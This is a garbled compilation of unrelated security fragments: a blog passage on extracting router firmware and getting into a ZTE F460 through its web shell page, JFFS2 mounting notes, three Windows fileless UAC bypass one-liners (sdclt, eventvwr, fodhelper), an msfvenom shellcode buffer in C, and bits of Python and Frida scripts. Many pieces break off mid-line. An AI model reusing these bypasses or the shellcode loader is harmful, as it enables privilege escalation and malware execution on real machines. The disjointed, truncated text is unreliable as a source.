After cracking the optical modem I still wasn't satisfied, so I kept tinkering and looked up some tutorials on smart-device security. The first step in analyzing the security of a smart or embedded device is to extract the firmware, so extracting the firmware is what comes next.
Read the MTD partition table through the /proc virtual filesystem:
/ # cat /proc/mtd
dev: size erasesize name
mtd0: 08000000 00020000 "whole flash"
mtd1: 00200000 00020000 "u-boot"
#!/usr/bin/python3
from cmd import Cmd
import requests
import readline
import sys
from base64 import b64encode
from random import randrange
import threading
from time import sleep
Mounting JFFS2 Images on a Linux PC
It is possible to mount a binary JFFS2 image on a Linux PC without a flash device. This can be useful for examining the contents of the image, making required changes, and creating a new image in any format. When a JFFS2 image is copied directly from a JFFS2 flash partition, the resulting image is the size of the source partition, regardless of how much space is actually used for storage. Mounting the filesystem and using the mkfs.jffs2 utility to create a new image will result in a JFFS2 image without blank nodes. This can also be used to create multiple images for flashes with different characteristics, such as erase block sizes. This page describes two different methods of mounting JFFS2 images on a Linux PC.
This procedure requires that the following kernel modules are available as loadable modules or built into the kernel on the development machine: mtdram, mtdblock, jffs2, block2mtd, and loop.
One method of mounting JFFS2 images uses the mt
The optical modem I was using before accidentally got water in it and burned out, so I got a ZTE F460 to use instead. There are countless methods online, but none of them worked when I tried them.
China Telecom is sneaky: as soon as you register the LOID they shut off telnet on you, and then you can't do anything. I spent the whole day today working on it and finally got the telecomadmin password, and I can now TELNET into the router at any time.
Without cracking it you only have an ordinary user account, and apart from the Wi-Fi password you can't change anything; the Wi-Fi name must start with ChinaNet, and worse still, China Telecom can remotely control the router at any time.
The simplest method is to connect to the router by wire or wirelessly, visit http://192.168.1.1/web_shell_cmd.gch, and run the following commands to get the superuser password
#sdclt fileless UAC bypass
regg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
#eventvwr fileless UAC bypass
%windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe $executablepath = "Start-Process -FilePath 'cmd.exe'";$cmd = 'Start-Process -FilePath {0} -ArgumentList "/c reg add "HKCU\Software\Classes\mscfile\shell\open\command" /f /d "{0} /c %windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -c \"IEX $executablepath;IEX $cmd) "' -f $env:comspec;
#fodhelper fileless UAC bypass
New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Value "cmd /c start powershell.exe" -Force;New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force;Start-Process "C:\Windows\System32\fodhelper.exe";Remove-Item "HKCU:\Software\Classes\ms-settings\
Let's say you want to access the application's shared preferences in /data/data/com.mypackage.
You could try to run adb shell and then run-as com.mypackage
(or adb shell run-as com.mypackage ls /data/data/com.mypackage/shared_prefs),
but on a production release app downloaded from an app store you're most likely to see:
run-as: Package 'com.mypackage' is not debuggable
#pragma comment(lib, "Shell32.lib")
#include <windows.h>
#include <shlobj.h>
// msfvenom -p windows/exec -a x86 --platform windows -f c cmd=calc.exe
int buf_len = 193;
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
import requests
import json
import pprint
import sys
import dns.message
import dns.query
import dns.rdatatype
import dns.resolver
import dns.reversename
import time
After a little more research, the 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-)
These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs.
Basic gist after running PS script statements:
- Loads C# project from file or web URL
- Creates various tmp files
- Compiles with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"]
- Converts to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"]
import frida, sys
def on_message(message, data):
    if message['type'] == 'send':
        print("[*] {0}".format(message['payload']))
    else:
        print(message)
jscode = """
Java.perform(function() {